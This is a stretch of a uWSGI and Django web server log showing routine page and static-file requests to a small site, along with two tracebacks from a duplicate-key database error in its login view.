15 01:38:50 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4351] 219.228.146.160 () {38 vars in 765 bytes} [Fri Jan 15 01:38:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4352] 219.228.146.160 () {38 vars in 763 bytes} [Fri Jan 15 01:38:51 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4353] 219.228.146.160 () {38 vars in 755 bytes} [Fri Jan 15 01:38:51 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4354] 219.228.146.160 () {38 vars in 747 bytes} [Fri Jan 15 01:38:51 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4355] 219.228.146.160 () {38 vars in 774 bytes} [Fri Jan 15 01:38:52 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.160 client_port: 65229] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2990/4356] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:39:20 2021] GET /all-0-0-0 => generated 13893 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2991/4357] 180.160.63.35 () {40 vars in 891 bytes} [Fri Jan 15 01:39:23 2021] GET /single/18/ => generated 9399 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2992/4358] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:39:23 2021] GET /single/18 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2993/4359] 219.228.146.176 () {40 vars in 821 bytes} [Fri Jan 15 01:39:23 2021] GET /single/18/ => generated 9398 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2994/4360] 219.228.146.195 () {38 vars in 865 bytes} [Fri Jan 15 01:39:29 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2995/4361] 219.228.146.195 () {48 vars in 1009 bytes} [Fri Jan 15 01:39:31 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2996/4362] 219.228.146.195 () {40 vars in 913 bytes} [Fri Jan 15 01:39:31 2021] GET /home/ => generated 11134 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2997/4363] 219.228.146.195 () {40 vars in 920 bytes} [Fri Jan 15 01:39:34 2021] GET /all-0-0-0 => generated 13900 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4364] 219.228.146.195 () {40 vars in 927 bytes} [Fri Jan 15 01:39:34 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2998/4365] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 01:39:41 2021] GET /single/16/ => generated 9971 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2999/4366] 219.228.146.176 () {46 vars in 960 bytes} [Fri Jan 15 01:39:48 2021] POST /single/18/ => generated 0 bytes in 12 msecs (HTTP/1.1 302) 7 headers in 203 bytes (2 switches on core 0) +[pid: 25874|app: 0|req: 3000/4367] 219.228.146.176 () {42 vars in 851 bytes} [Fri Jan 15 01:39:48 2021] GET /single/18 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3001/4368] 219.228.146.176 () {42 vars in 853 bytes} [Fri Jan 15 01:39:48 2021] GET /single/18/ => generated 9916 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3002/4369] 219.228.146.195 () {48 vars in 1105 bytes} [Fri Jan 15 01:39:55 2021] POST /single/16/ => generated 0 bytes in 14 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3003/4370] 219.228.146.195 () {42 vars in 955 bytes} [Fri Jan 15 01:39:55 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3004/4371] 219.228.146.195 () {42 vars in 957 bytes} [Fri Jan 15 01:39:55 2021] GET /single/16/ => generated 10494 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3005/4372] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:40:01 2021] GET /all-0-0-0 => generated 13893 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3006/4373] 219.228.146.176 () {40 vars in 833 bytes} [Fri Jan 15 01:40:07 2021] GET /ownpublish-0-0-0 => generated 10085 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3007/4374] 219.228.146.176 () {40 vars in 840 bytes} [Fri Jan 15 01:40:10 2021] GET /ownpublish-0-0-0 => generated 10085 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3008/4375] 219.228.146.176 () {40 vars in 824 bytes} [Fri Jan 15 01:40:13 2021] GET /all-0-0-0 => generated 13893 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3009/4376] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 01:40:19 2021] GET /all-0-0-0 => generated 13900 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 25874|app: 0|req: 3010/4377] 219.228.146.195 () {40 vars in 923 bytes} [Fri Jan 15 01:40:22 2021] GET /all-8-0-0 => generated 10267 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3011/4378] 219.228.146.195 () {40 vars in 921 bytes} [Fri Jan 15 01:40:24 2021] GET /publish/ => generated 5325 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3012/4379] 219.228.146.195 () {40 vars in 918 bytes} [Fri Jan 15 01:40:29 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3013/4380] 180.160.63.35 () {40 vars in 891 bytes} [Fri Jan 15 01:40:34 2021] GET /single/16/ => generated 10476 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3014/4381] 114.87.129.251 () {38 vars in 925 bytes} [Fri Jan 15 01:41:01 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3015/4382] 114.87.129.251 () {38 vars in 927 bytes} [Fri Jan 15 01:41:01 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4383] 114.87.129.251 () {40 vars in 971 bytes} [Fri Jan 15 01:41:01 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4384] 114.87.129.251 () {40 vars in 989 bytes} [Fri Jan 15 01:41:01 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4385] 114.87.129.251 () {40 vars in 969 bytes} [Fri Jan 15 01:41:01 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4386] 114.87.129.251 () {40 vars in 975 bytes} [Fri Jan 15 01:41:01 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4387] 114.87.129.251 () {40 vars in 950 bytes} [Fri Jan 15 01:41:01 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4388] 114.87.129.251 () {40 vars in 967 bytes} [Fri Jan 15 01:41:01 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 114.87.129.251 client_port: 25809] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 114.87.129.251 client_port: 25041] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 3016/4389] 114.87.129.251 () {40 vars in 1016 bytes} [Fri Jan 15 01:41:03 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4390] 114.87.129.251 () {40 vars in 967 bytes} [Fri Jan 15 01:41:03 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4391] 114.87.129.251 () {40 vars in 989 bytes} [Fri Jan 15 01:41:03 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4392] 114.87.129.251 () {40 vars in 975 bytes} [Fri Jan 15 01:41:03 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4393] 114.87.129.251 () {40 vars in 971 bytes} [Fri Jan 15 01:41:03 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4394] 114.87.129.251 () {40 vars in 964 bytes} [Fri Jan 15 01:41:03 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4395] 114.87.129.251 () {40 vars in 948 bytes} [Fri Jan 15 01:41:03 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4396] 114.87.129.251 () {40 vars in 956 bytes} [Fri Jan 15 01:41:04 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4397] 114.87.129.251 () {40 vars in 966 bytes} [Fri Jan 15 01:41:04 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4398] 114.87.129.251 () {40 vars in 950 bytes} [Fri Jan 15 01:41:04 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4399] 114.87.129.251 () {40 vars in 1045 bytes} [Fri Jan 15 01:41:07 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4400] 114.87.129.251 () {40 vars in 1051 bytes} [Fri Jan 15 01:41:07 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4401] 114.87.129.251 () {40 vars in 1019 bytes} [Fri Jan 15 01:41:07 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 3017/4402] 219.228.146.195 () {48 vars in 1010 bytes} [Fri Jan 15 01:41:50 2021] POST /login/ => generated 82 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3018/4403] 219.228.146.195 () {48 vars in 1010 bytes} [Fri Jan 15 01:41:57 2021] POST /login/ => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3019/4404] 219.228.146.195 () {48 vars in 1009 bytes} [Fri Jan 15 01:41:59 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3020/4405] 219.228.146.195 () {40 vars in 913 bytes} [Fri Jan 15 01:41:59 2021] GET /home/ => generated 11152 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3021/4406] 219.228.146.195 () {40 vars in 920 bytes} [Fri Jan 15 01:42:02 2021] GET /all-0-0-0 => generated 13918 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4407] 219.228.146.195 () {40 vars in 899 bytes} [Fri Jan 15 01:42:02 2021] GET /static/img/t_photo/16_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 3022/4408] 219.228.146.195 () {40 vars in 924 bytes} [Fri Jan 15 01:42:03 2021] GET /single/1/ => generated 9487 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3023/4409] 219.228.146.195 () {48 vars in 1103 bytes} [Fri Jan 15 01:42:15 2021] POST /single/1/ => generated 0 bytes in 13 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3024/4410] 219.228.146.195 () {42 vars in 953 bytes} [Fri Jan 15 01:42:15 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3025/4411] 219.228.146.195 () {42 vars in 955 bytes} [Fri Jan 15 01:42:15 2021] GET /single/1/ => generated 10034 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3026/4412] 114.85.232.210 () {38 vars in 938 bytes} [Fri Jan 15 01:42:32 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3027/4413] 114.85.232.210 () {38 vars in 940 bytes} [Fri Jan 15 01:42:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3028/4414] 114.85.232.210 () {40 vars in 1029 bytes} [Fri Jan 15 01:42:36 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4415] 114.85.232.210 () {40 vars in 980 bytes} [Fri Jan 15 01:42:36 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4416] 114.85.232.210 () {40 vars in 1002 bytes} [Fri Jan 15 01:42:36 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4417] 114.85.232.210 () {40 vars in 982 bytes} [Fri Jan 15 01:42:36 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4418] 114.85.232.210 () {40 vars in 984 bytes} [Fri Jan 15 01:42:36 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4419] 114.85.232.210 () {40 vars in 988 bytes} [Fri Jan 15 01:42:36 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4420] 114.85.232.210 () {40 vars in 963 bytes} [Fri Jan 15 01:42:36 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4421] 114.85.232.210 () {40 vars in 960 bytes} [Fri Jan 15 01:42:36 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4422] 114.85.232.210 () {40 vars in 979 bytes} [Fri Jan 15 01:42:36 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4423] 114.85.232.210 () {40 vars in 977 bytes} [Fri Jan 15 01:42:36 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4424] 114.85.232.210 () {40 vars in 969 bytes} [Fri Jan 15 01:42:36 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4425] 114.85.232.210 () {40 vars in 1058 bytes} [Fri Jan 15 01:42:39 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4426] 114.85.232.210 () {40 vars in 1064 bytes} [Fri Jan 15 01:42:39 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4427] 114.85.232.210 () {40 vars in 1032 bytes} [Fri Jan 15 01:42:39 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 3029/4428] 223.104.213.30 () {38 vars in 755 bytes} [Fri Jan 15 01:43:51 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3030/4429] 223.104.213.30 () {38 vars in 755 bytes} [Fri Jan 15 01:43:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4430] 223.104.212.22 () {38 vars in 725 bytes} [Fri Jan 15 01:46:21 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4431] 223.104.212.22 () {38 vars in 712 bytes} [Fri Jan 15 01:46:21 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4432] 223.104.212.22 () {38 vars in 728 bytes} [Fri Jan 15 01:46:21 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4433] 223.104.212.22 () {38 vars in 772 bytes} [Fri Jan 15 01:46:22 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4434] 223.104.212.22 () {38 vars in 710 bytes} [Fri Jan 15 01:46:22 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 25874|app: 0|req: 3031/4435] 223.104.212.22 () {48 vars in 928 bytes} [Fri Jan 15 01:46:28 2021] POST /login/ => generated 208721 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 